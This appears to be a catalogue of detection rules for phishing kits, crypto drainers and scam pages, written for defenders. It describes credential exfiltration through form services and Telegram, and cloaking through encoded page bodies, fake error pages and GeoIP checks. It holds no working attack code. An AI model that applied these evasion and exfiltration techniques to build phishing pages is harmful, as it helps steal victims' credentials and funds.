IOK Rules

BBVA Phishing Kit aeng1e8e

Detects a BBVA (Banco Bilbao Vizcaya Argentaria) phishing kit deployed often on replit.com.

Vitalik Buterin fake crypto giveaway cbn4xt8m

Detects a scam giveaway landing page which claims to host a large cryptocurrency event. It asks you to send coins to a wallet to have them doubled.

BazhanWang Website Copier

Detects the BazhanWang website copier.

Solana cryptocurrency wallet drainer - tokenup

Detects a Solana cryptocurrency wallet drainer that fakes the number of minted NFTs to initiate Fear of Missing Out (FOMO) against the victim.

Banco del Pacífico Phishing Kit 1kzes5jt

Detects a Banco del Pacífico phishing kit deployed often on replit.com.

Facebook Phishing Kit 54b8f7e

Detects a Facebook phishing kit.

Exfiltration using formpost.app

formpost.app is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Square Enix FFXIV Gil Phishing Kit

Detects a phishing kit targeting square-enix.com with a fake FFXIV forum gil giveaway. Phishing kit consists of two pages, a forum page and a login page.

Steam Phishing Kit 4f8189ec

Steam Phishing Kit that uses a fake Steam login window to steal user credentials.

ThemeTags Template Service

Detects page templates made by ThemeTags. Services like this are commonly abused by phishing pages.

Asli Crypto Drainer ea8f67e

Detects a family of crypto drainers that utilises a similarly structured landing page.

Okta ("0ktapus"/"Scatter Swine") phishing kit

Okta is a Single Sign-On (SSO) provider used by many enterprises and this phishing kit targets those enterprises. It aims to steal the victim's email address, SSO password, and MFA details. To decrease victim's suspicion this kit (like many) includes details specific to the targeted company e.g. their name and logo. However, unlike similar kits, this is hardcoded per instance of the phishing site and isn't dynamic based on the victim's email. ![Screenshot of one of these camouflaged Okta phishing kits (in this case, actually targeting Okta's own employees). [Via urlscan.io](https://urlscan.io/result/63fc7edd-116c-4128-a934-8ad6c9ad76e2/)](/static/63fc7edd-116c-4128-a934-8ad6c9ad76e2-BIDTSTDO.png) The same frontend code (HTML, CSS, and JS) is deployed regardless of the company being targeted, but the company name and logo is provided by the C2 server. ### Capabilities From analysing the code it appears this kit is set up to: * Steal email address and password * Capture MFA codes * Push the download of a (trojanized?) remote desktop tool `AnyDesk.exe` ### Timeline So far, the earliest observed appearance of this campaign was on July 1st ([urlscan.io](https://urlscan.io/result/4125359d-3fea-4161-b0a9-bed1e3c04e16)). This is a slightly earlier version of the phishing kit (referencing slightly different JS files) and was last seen on July 13th. The more recent version of the kit (using the JS filenames referenced in this rule) was first observed on [July 17th](https://urlscan.io/result/0c7aba52-edf4-4280-9bc5-783fb8c93d87/). ### Attack Infrastructure Unlike many less sophisticated kits, this isn't deployed on a PHP hosting provider but is instead deployed on virtual machines (usually provided by Digital Ocean or Vultr). * Frontend assets (HTML/JS/CSS) are loaded from the domain itself * The config (for example, which logo to display) is loaded from a separate, non-HTTPS endpoint hosted on port 8080 on the same server ```mermaid graph LR subgraph C2[Attack Infrastructure] Domain[Lookalike Domain] --> IP[Server IP] end Browser[Victim's Browser] -->|Load frontend: GET https://domain| Domain Browser -->|Fetch name and logo: GET http://ip:8080/api/app/settings| IP ``` Most infrastructure is unique to each attack but there's occasionally some crossover: * [45[.]63[.]39[.]151](https://urlscan.io/ip/45.63.39.151) has been seen targeting multiple companies. * [mailchimp-help[.]com](https://urlscan.io/domain/mailchimp-help.com) has been observed targeting multiple companies.

Luno crypto exchange phishing kit beb8d53

Luno crypto exchange phishing kit that has a high entropy string set as the `origin-trial` value

Camouflaged Okta kit (old)

An older version of the Okta phishing kit [described here](https://phish.report/IOK/indicators/okta-5844ad4)

Davivienda Phishing Kit 2j5dxddh

Detects a Davivienda phishing kit deployed often on replit.com targeting Colombian citizens.

Dubai Islamic Bank Phishing Kit e6f3d238

Dubai Islamic Bank Phishing Kit that uses a fake login page

Mark of the Web

The "Mark of the Web" is an Internet Explorer compatibility feature inserted into HTML by browsers when using their "Save webpage" feature. The comment includes the original URL that the HTML was cloned from.

Shopify phishing kit 89NDeg

Shopify phishing kit containing a high-entropy CSRF token which should be a high quality indicator.

Bancolombia Phishing Kit 68a8d3f

Detects a Bancolombia phishing kit targeting Spanish speaking users. Commonly deployed on `replit.com`.

Fake crypto giveaway coin selection cxlw6bu4

Detects a scam giveaway landing page which claims to host a large cryptocurrency event. Sometimes the scammer will pick a specific cryptocurrency to target, but in this case they decided to add a menu where the user can select a specific coin.

NordPass Phishing Kit 79fa7dc3

NordPass Phishing Kit that uses a fake login page to steal user credentials.

Patelco phishing kit 48ba653f

Patelco phishing kit which uses the same stylesheet and form error id across various domains.

Shopify phishing kit c546c6a9

Shopify phishing kit containing a high-entropy device identifier which should be a high quality indicator.

Bancor Phishing Kit 5bb0b5u3

Detects a Bancor phishing kit deployed often on replit.com.

Base64 & URL-encoded document body

To evade static analysis, the document body can be wrapped in several JavaScript functions such as `decodeURIComponent` and `atob` in order to evade analysis. This helps defeat simple scanners which don't evaluate JavaScript.

GOVUK m3dular Phishing Kit ea8f67e

Detects a GOVUK phishing kit targeting citizens of the UK. Kit developed by a user under the alias of 'm3dular' (https://twitter.com/JCyberSec_/status/1575054303873486848) kit intelligence provided by @JCyberSec_.

HTTrack Website Copier

HTTrack is an open source tool to save a website and all its dependencies to disk. It's used by phishers to quickly clone a target website to get a pixel-perfect clone they can adapt into a phishing kit. It's particularly liked by phishers because it tries to ensure that *all* resources are saved offline, and none are left being loaded from the original server.

Hypixel Phishing Kit b03e14c

Detects a Hypixel phishing kit being pushed in-game as well as across Discord.

Shopify phishing kit YgjX6

Shopify phishing kit containing a high-entropy CSP nonce which should be a high quality indicator.

Nuevo Banco del Chaco Phishing Kit ri0z68ca

Detects a Nuevo Banco del Chaco phishing kit using a form action URL and a CSRF token that only appears in this kit. Deployed often on replit.com.

Shopify phishing kit 45ca55e3

Shopify phishing kit containing a high-entropy device identifier which should be a high quality indicator.

Adobe Phishing Kit 5c70696

Adoba phishing kit which uses the same `template` element `id` attribute as well as having the same value inside the `noscript` tags.

Banco de la República (eBROU) Phishing Kit g5d6u78z

Detects a Banco de la República phishing kit using a form action URL and CSS files that only appear in this kit. Deployed often on `replit.com`.

Banco Promerica Phishing Kit ef73ish1

Detects a Banco Promerica phishing kit with images and form action URL that only appear in this kit. Deployed often on `replit.com`.

Banco Santa Fe phishing kit 9d6d57a2

Banco Santa Fe phishing kit which uses the same CSS and JS files.

Facebook phishing kit displaying a faked post

A Facebook phishing kit displaying a faked post

Fake crypto giveaway coin selection b791myo4

Detects a scam giveaway landing page which claims to host a large cryptocurrency event. Sometimes the scammer will pick a specific cryptocurrency to target, but in this case they decided to add a menu where the user can select a specific coin.

Banco AV Villas Phishing Kit a5lnamb9

Detects a Banco AV Villas phishing kit deployed often on replit.com targeting Colombian citizens.

Facebook phishing kit displaying a login form

A Facebook phishing kit displaying a login form

Microsoft Phishing Kit EwNaWJpB

Detects a Microsoft phishing kit in Spanish, targeting the citizens of Argentina.

Bank of Nova Scotia (Scotiabank) Phishing Kit TYnAqzTX

Detects a phishing kit for the Bank of Nova Scotia (Scotiabank) targeting Spanish speaking users. Deployed often on replit.com.

Discord Hypesquad phishing kit strolly

Discord Hypesquad phishing kit containing a comment left behind by the supposed developer of the kit. As well as a unique nonce value that is present.

DPD Phishing Kit 1550321

Detects a DPD phishing kit using the same fake parcel ID to lure victims in, additionally reuses the same file names and paths for various kit assets.

Ethereum cryptocurrency wallet drainer - settings

Detects a Ethereum cryptocurrency wallet drainer that includes a separate file, settings.js, to configure how it sweeps the victim's wallet.

Elon Musk fake crypto giveaway xfve5qjx

Detects a scam giveaway landing page which claims to host a large cryptocurrency event. It asks you to send coins to a wallet to have them doubled.

Generic Email ec34bc68

A generic email phishing kit loading CSS from an appspot project using a hard-coded access token.

123 Reg phishing kit 63c26

123 Reg phishing kit containing a high-entropy CSRF token which should be a high quality indicator.

Banco de Galicia Phishing Kit npy0f6km

Detects a different Banco de Galicia phishing kit deployed often on replit.com.

Discord Phishing Kit 664a17b

Discord phishing kit that uses a external application invite as a lure, as well as the real DiscordServer discord bot logo to make it seem legitmate. Once the user clicks the button labelled authorize it will open a pop-up window mimicking the Discord login page pretty poorly. This rule uses the fact that the same CSS file name is used across all domains that use this kit.

Discord oAuth2 Scam u8eviyps

Detects a Discord oAuth2 scam confirmation page, which is often used in combination with social engineering to get the user to authorize for a spam application. This for example enables the attacker to add the victims into further scam/advertised servers using the 'guilds.join' scope.

Itaú Unibanco Phishing Kit s8hx648o

Detects a different Itaú Unibanco phishing kit. Discovered as a result of this being deployed on Replit.com.

"Validate your account" countdown timer

This phishing kit (reported on by Cofense in 2022, but first seen on urlscan.io in 2018) has a live countdown until a user's email is supposedly "deleted from our server".

Exfiltration using getform.io

getform is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Microsoft Phishing Kit rxkr4n3b

Detects a poorly designed and simple Microsoft phishing kit. Discovered as a result of this being deployed on Replit.com.

rot13 encoded body

To evade static analysis, the document body can returned with each character rotated by some fixed amount in the response where JavaScript can decode it and append it to the DOM. This helps defeat simple scanners which don't evaluate JavaScript.

Shopify phishing kit NCv2F

Shopify phishing kit containing a high-entropy CSP nonce which should be a high quality indicator.

Banco Galicia Phishing Kit bd53a32

Detects a Banco Galicia phishing kit deployed quite oftenly on `replit.com`.

Banco de Galicia Phishing Kit vyk7k7oo

Detects a different Banco de Galicia phishing kit deployed often on `replit.com`. This kit uses JavaScript to dynamically load the login form HTML after you click on a SVG.

Coinbase clone generic

Detects a cloned version of the Coinbase website from the past that uses the same `amplitude.js` API key as well as the same Google Site Verification keys, they used to use.

DHL Phishing Kit f8e6d46

Detects a DHL phishing kit that has several indicators that are exclusive to the kit itself, such as the endpoint where the credentials are exfiltrated to, and the name of credit card validation function.

Facebook Phishing Kit 887906f

Detects a Facebook phishing kit targeting Vietnamese users. Using sexual lures such as 'Vietnamese Sexy Beauty Group'

Commbank phishing kit displaying a fake login

Commbank phishing kit displaying a fake login

Facebook Phishing Kit 7d71c1c

Detects a Facebook phishing kit targeting Polish speaking users. Using the same login form structure across all domains as well as using the same name for the logo file.

Fake Chrome error page

The Chrome error page HTML is built into the browser: you should never see it in the response from a website. This is a clear sign that the site is employing cloaking/anti-analysis techniques.

UPS Phishing Kit 69b689e

Detects a UPS phishing kit using a fake parcel ID to lure victims in, additionally has a high entropy string that does not change assigned as the `data-upstoken` attribute of a HTML element within the page, possibly left behind when the original UPS page was cloned.

Banco de la República Phishing Kit eec45a8

Detects a phishing kit targeting Banco de la República (eBROU), which is often deployed on `replit.com`. It uses `api.ipify.org` to fetch the victim's IP. Harvested credentials are delivered into the scammer's Telegram channel.

Bancolombia Phishing Kit 3kyj5nlh

Detects a different Bancolombia phishing kit deployed often on replit.com targeting Colombian citizens.

Microsoft Phishing Kit be5a6fa

Detects a Microsoft phishing kit targeting Spanish speaking users.

Microsoft Tech Support Kit d94c3cf

Detects a Microsoft tech support kit targeting Japanese speaking users. Using the same name for the warning audio file as well as the same class `name` attribute for the banner elements.

SMBC Phishing Kit 9776441

Detects a SMBC phishing kit targeting Japanese users.

Steam phishing kit 8c89c4f

Steam phishing kit containing an image URL that only appears in phishing pages, additionally uses Discord Nitro as a lure.

1Password phishing kit - 191635

1Password phishing kit cloned from the legitimate `1password.com` login page using Save Page WE. The first detection was on August 16th although evidence in the kit (the Save Page WE `savepage-date` timestamp) suggests it was created August 11th. Like many similar phishing kit, credentials are posted to `send.php` and then the victim is redirected to the `1password.com` login form.

Bancolombia Phishing Kit aUwvKPIV

Detects a phishing kit targetting Bancolombia, which is often deployed on `replit.com`. Uses `api.ipify.org` to fetch the victim's IP. Harvested credentials are delivered into the scammer's Telegram channel.

Facebook Phishing Kit 54b8f7e Landing Page

Detects the landing page of this specific phishing kit.

reCAPTCHA

To make it harder to analysts to get a good capture of a phishing site, some are using Google's reCAPTCHA service.

Save Page WE website saver

Save Page WE is a chrome extension used by phishers to clone a target website and save it as a single HTML file. Unlike HTTrack (another commonly used tool): * It's a browser extension so doesn't require any additional tools to be installed. * It saves pages as a single HTML file (with all assets embedded in it) which makes the resulting kit more portable and easier to deploy.

Scotiabank Phishing Kit 76fc8cb

Detects a Bank of Nova Scotia (Scotiabank) phishing kit targeting Spanish speaking users. Commonly deployed on `replit.com`.

SMBC Phishing Kit 10ddf87

Detects a SMBC phishing kit targeting Japanese users.

BBVA Phishing Kit k3dums5h

Detects a BBVA (Banco Bilbao Vizcaya Argentaria) phishing kit deployed often on replit.com.

Facebank Phishing Kit 0y8ysfop

Detects a Facebank phishing kit targeting citizens of Puerto Rico. Discovered as a result of this being deployed on Replit.com.

Facebook phishing kit with peculiar opengraph tags

A Facebook phishing kit which includes some peculiar OpenGraph tags originally from https://www.jpl.nasa.gov/news/testing-proves-its-worth-with-successful-mars-parachute-deployment

Generic crypto scam f634ac3

Generic Crypto Scam phishing kit using the same Smart Support Chat API key on different domains.

Meta Phishing Kit 506188c

Detects a phishing kit targeting Meta products, utilising the false copyright infrigment appeal scam.

Microsoft Outlook Phishing Kit 9e75296

Detects a Microsoft Outlook phishing kit targeting Spanish speaking users.

Banco Atlántida Phishing Kit dxde4jyt

Detects a Banco Atlántida phishing kit deployed often on replit.com.

Banco del Pacífico Phishing Kit bl54hwhz

Detects a different Banco del Pacífico phishing kit deployed often on replit.com.

Bookmark Grabber bf623f6

Detects a phishing page that leverages the Dyno discord bot as a lure to install a malicious browser bookmark to steal the victim's Discord token.

Exfiltration using FormSubmit.co

FormSubmit is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Hex-encoded document body

To evade static analysis, the document body can returned hex encoded in the response where JavaScript can decode it and append it to the DOM. This helps defeat simple scanners which don't evaluate JavaScript.

Mobirise Website Builder

Detects signatures left behind by the Mobirise Website Builder.

Exfiltration using ActionForms

ActionForms is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

An Post Phishing Kit 7b94e511

Detects an An Post phishing kit that uses the same fake tracking ID across multiple domains.

Banco de la Nación Phishing Kit 0blz45du

Detects a Banco de la Nación phishing kit using a form action URL and a button ID that only appear in this kit. Deployed often on `replit.com`.

Santander Phishing Kit 5d1468e

Detects a Santander phishing kit targeting Polish victims, this kit uses the website cloner browser extension known as [WebScrapBook](https://chrome.google.com/webstore/detail/webscrapbook/oegnpmiddfljlloiklpkeelagaeejfai?hl=en) in order to clone the original page. Github: https://github.com/danny0838/webscrapbook

SingleFile website cloner

SingleFile is a Chrome extension allowing you to save a complete webpage (HTML, CSS, JS, etc.) into a single file.

BBVA Phishing Kit dd072db

Detects a Banco Bilbao Vizcaya Argentaria (BBVA) phishing kit targeting Argentinian users.

Generic crypto scam 0694191

Generic Crypto Scam phishing kit that includes a reference to the owner of the website via a HTML link tag

Microsoft Phishing Kit zuu2wvfc

Detects a Microsoft phishing kit with a lot of entropy, making it easy to detect. Discovered as a result of this being deployed on Replit.com.

ipapi

ipapi is a GeoIP service allowing you to get the country code and other information from an IP address. It's regularly used by phishing kits which want to hide themselves to analysts outside the country they're targeting. This is a very naive approach (often the entire phishing site is loaded but then immediately redirected away from), but is often enough to evade basic sandboxes.

Microsoft Tech Support Kit 0589be7

A Microsoft Tech support kit containing an audio file used across many different domains. As well as a JS function that is used to get the phone number from the URL parameters.

USPS Phishing Kit 9514901

Detects a USPS phishing kit that uses the same fake tracking ID & same stylesheet on every phish.

Shopify phishing kit f7ejw

Shopify phishing kit containing a high-entropy CSRF token (and a CSP nonce!) which should be a high quality indicator.

Exfiltration using NoCodeForm

NoCodeForm is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Santander Phishing Kit 85b6cae

Detects a Santander phishing kit targeting Spanish speaking users.

S-Pankki phishing kit d612de8e

S-Pankki phishing kit which uses the same hidden value across various domains.

Exfiltration using submit-form

submit-form is a service that takes HTML form submissions and sends the results to an email address, online dashboard, or webhook, depending on the threat actor. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

WebScrapBook website cloner

WebScrapBook is a chrome extension used by phishers to clone target websites. Github: https://github.com/danny0838/webscrapbook

Banco Falabela Phishing Kit 5fed617

Detects a phishing kit targeting Banco Falabella (Colombia) users Deployed often on `replit.com`.

Cazanova phishing kit

Cazanova is the alias of a prolific phishing kit creator. Lucky for us, they like to sign their work by using `cazanova` for their cookie name rather than the default `PHPSESSID`, which makes it simple to identify their work.

Exfiltration using Form2Chat

Form2Chat is a service that takes HTML form submissions and sends the results to an email address or instant messenger service. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Metamask Phishing Kit 604ec65

Metamask Phishing kit that uses WebFlow. Allowing us to flag it due to it having the same WebFlow site key for each phish.

Microsoft Phishing Kit 544eva7

Detects a Microsoft phishing kit targeting Spanish speaking users.

Office 365 Phishing Kit l03TtM

Detects a phishing kit targeting Office 365 using a fake login form. It doesn't attempt to visually mimic the official login pages, allowing it to evade common detection engines.

Bancolombia Phishing Kit GM866x

Detects a phishing kit targeting Bancolombia with a simple centered login form. This was detected as a result of this kit being deployed on Replit.

Ethereum cryptocurrency wallet drainer - Iil1ililIl1iIl1ill1Ilii

Detects an Ethereum cryptocurrency wallet drainer that has a constant variable named Iil1ililIl1iIl1ill1Ilii.

Fake Not Found page

A common way for phishing sites to avoid detection is by presenting a fake 404 error page when requested using the "wrong" User Agent (or from the wrong GeoIP location). These fake error pages exactly mimic the HTML of an Apache 404 page, but unless the threat actor has configured their site to hide it, there's two giveaways it's fake: - It sends an `X-Powered-By: PHP` header - It sets a `PHPSESSID` cookie These are both clear evidence that the 404 page has been generated by PHP and not by Apache.

Steam phishing kit 4540135

Steam phishing kit containing an image (sha256: `8c89c4f3023d02b04197a30ca20f42ca7eb2634e1432ffff7b9d641a1f71a066`) that only appears in phishing pages. It uses Discord Nitro as a lure to make the victim willingly give away their login credentials.

Wise Phishing Kit d777126

Wise phishing kit which uses the same sentry.io API key across various domains.

KuCoin Phishing Kit 8fo0kgp3

Detects a KuCoin phishing kit deployed often on replit.com.

Amazon Phishing Kit 28bd59a

Detects an Amazon phishing kit targeting Japanese users. This kit is dynamically generated by Javascript.

Avis Phishing Kit 0fbd3ca

Detects an Avis phishing kit targeting Turkish users.

Banco Davivienda Phishing Kit 067fef0

Detects a Banco Davivienda phishing kit deployed often on replit.com.

Class attribute obfuscation

Detects an obfuscation technique found being used by a TrustWallet phishing kit where it appends several repeating groups of characters to the class attribute of all HTML elements in the page.

Coinsbit Phishing Kit a4a01a8

Detects a Coinsbit phishing kit.

Exodus Wallet Phishing Kit

Detects a Exodus Wallet cryptocurrency wallet drainer that includes a function to validate the BIP39 recovery phrase entered.

Base64-encoded document body

To evade static analysis, the document body can returned base64 encoded in the response where JavaScript can decode it and append it to the DOM. This helps defeat simple scanners which don't evaluate JavaScript.

Discord Nitro phishing kit 7a09ee6

Discord Nitro phishing kit containing a reused image asset.

Exfiltration using formspree.io

Formspree is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

HSBC phishing kit ea738a3

HSBC phishing kit which uses the same fake login detected HTML element across various domains.

Santander Phishing Kit 951d27d

Detects a Santander phishing kit targeting Spanish speaking users.

Facebook Account Recovery Phishing Kit 0e420f8

Detects a Facebook phishing kit, telling the victim to enter their details to reactivate their account.

Santander Phishing Kit d639dea

Detects a Santander phishing kit using the same stylesheet filename on each domain, also includes an indicator referring to a `div` element's `id` attribute as "shittymodal".

Suncoast Credit Union Phishing Kit 4c74e401

Detects a Suncoast Credit Union phishing kit that uses the same commented out JS and static VIcurrentDateTime value on all domains.

testcookie NGINX anti-bot

`testcookie-nginx-module` is a basic anti-bot mechanism using a JavaScript-based challenge to defeat simple analysis by sandboxes which don't evaluate JavaScript.

Westpac phishing kit c5c1bfe0

Westpac phishing kit which uses the same CSS files and directory structure across various domains.